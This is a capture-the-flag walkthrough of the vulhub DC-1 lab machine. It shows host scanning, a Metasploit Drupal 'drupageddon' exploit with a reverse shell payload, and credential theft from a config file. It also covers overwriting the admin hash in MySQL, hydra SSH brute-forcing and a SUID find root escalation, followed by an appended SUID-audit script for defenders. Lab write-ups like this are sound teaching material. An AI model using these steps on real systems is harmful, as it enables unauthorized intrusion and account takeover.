DC-1

vulhub DC-1 target machine penetration test

Information gathering

root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.150.80 netmask 255.255.240.0 broadcast 192.168.159.255
inet6 fe80::a00:27ff:fe5c:6526 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:5c:65:26 txqueuelen 1000 (Ethernet)
RX packets 2 bytes 688 (688.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 65 bytes 10552 (10.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

ANDing the IP address with the subnet mask gives the network address 192.168.144.0/20

Host discovery and port scanning

nmap -sS 192.168.144.0/20
192.168.146.232 is the live host
nmap -sS -Pn 192.168.146.232
Nmap scan report for DC-1.mshome.net (192.168.146.232)
Host is up (0.00058s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
MAC Address: 08:00:27:DB:C2:6F (Oracle VirtualBox virtual NIC)

Port 80 is open, so visit robots.txt
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

From update.txt and install.txt we learn
that the version is Drupal 7.x
The requirements are

Path scanning

dirb http://192.168.146.232/
Here I also recommend a directory scanning tool, SourceHacker
**SourceLeakHacker**
---- Scanning URL: http://192.168.146.232/ ----


Vulnerability discovery & exploitation

Using msf:
msfconsole
search drupal
use exploit/multi/http/drupal_drupageddon
set payload php/meterpreter/reverse_tcp
After receiving the reverse shell, run ls to list the directory

find flag1

cat flag1.txt

Every good CMS needs a config file - and so do you.

Since port 22 is open, look at the users under /home
flag4 is found there
home/flag4

cat flag4.txt

Can you use this same method to find or access the flag in root?

Probably. But perhaps it’s not that easy. Or maybe it is?
Following the hint in flag1.txt, the site's configuration file is at site/default/settings.php
It contains sensitive information

flag2
Brute force and dictionary attacks aren't the
only ways to gain access (and you WILL need access).
What can you do with these credentials?

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);


Use python to spawn bash and get a stable, persistent interactive shell: python -c 'import pty;pty.spawn("/bin/bash")'
Use the sensitive information found above to log in to the MySQL database
mysql -udbuser -pR0ck3t
select * from users;   -- lists the users and their password hashes
The hashes cannot be cracked, so instead run
update users set pass = '<hash of a known plaintext>' where name = 'admin';
The hashing script is at /var/www/scripts/password-hash.sh
php password-hash.sh admin123
Generate the hash and overwrite the existing one with it
After logging in to Drupal, flag3 is on the dashboard
Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow.

Privilege escalation

The hint about reading shadow means privilege escalation is definitely required
So connect via ssh
ssh flag4@192.168.146.232
The password is unknown, so try brute-forcing it
hydra -l flag4 -P /usr/share/john/password.lst 192.168.146.232
The password is orange
Once in the terminal
Try SUID privilege escalation
The following commands search for root-owned files with the SUID bit set; different systems accept different forms, so try them one by one
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;


A familiar find binary shows up in the list, so use find for privilege escalation
First verify that it works
/usr/bin/find flag4.txt -exec 'whoami' \;
root
Verified
/usr/bin/find . -exec /bin/sh \; -quit
Root privileges obtained
Enter the root directory
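As an added defender-side example (not part of the original writeup), the following Python script audits the output of the page's `find / -user root -perm -4000 -exec ls -ldb {} \;` command against an expected baseline and flags root-owned SUID binaries such as find that can run arbitrary commands, printing the `chmod u-s` remediation for each; the baseline set, the SHELL_CAPABLE list and the sample listing are assumptions constructed for the example.

```python
import os

# Assumption: baseline of SUID binaries a stock host legitimately ships; tailor per distribution.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/newgrp",
}

# Binaries that can execute arbitrary commands (-exec, shell escapes, interpreters):
# a root-owned SUID bit on any of these is equivalent to handing out a root shell.
SHELL_CAPABLE = {"find", "vim", "vi", "nmap", "python", "perl", "bash", "sh", "less", "awk"}

# Constructed sample output in the `ls -ld` format produced by the find -exec command above.
SAMPLE_LS = """\
-rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
-rwsr-xr-x 1 root root  44464 Jan  6  2012 /usr/bin/passwd
-rwsr-xr-x 1 root root  36832 Jan  6  2012 /bin/su
-rwsr-xr-x 1 root root  10552 Jan  6  2012 /usr/local/bin/backup-helper
-rwxr-xr-x 1 root root  10552 Jan  6  2012 /usr/bin/notsuid
"""


def parse_ls_line(line):
    """Return (mode, owner, path) from one `ls -ld` line, or None if malformed."""
    parts = line.split(None, 8)
    if len(parts) != 9:
        return None
    return parts[0], parts[2], parts[8]


def audit_suid(ls_output, expected=EXPECTED_SUID):
    """Classify every SUID entry; returns a list of (path, severity, remediation)."""
    findings = []
    for line in ls_output.splitlines():
        parsed = parse_ls_line(line)
        if parsed is None:
            continue
        mode, owner, path = parsed
        if mode[3] not in "sS":          # user-execute slot: 's' or 'S' means setuid
            continue
        if path in expected:
            continue
        name = os.path.basename(path)
        if owner == "root" and name in SHELL_CAPABLE:
            severity = "critical"        # direct root shell, e.g. find . -exec /bin/sh \; -quit
        else:
            severity = "review"          # unknown SUID binary: verify its package and need
        findings.append((path, severity, f"chmod u-s {path}"))
    return findings


if __name__ == "__main__":
    for path, severity, fix in audit_suid(SAMPLE_LS):
        print(f"{severity:8} {path}  ->  {fix}")
```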

cd /root
# cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7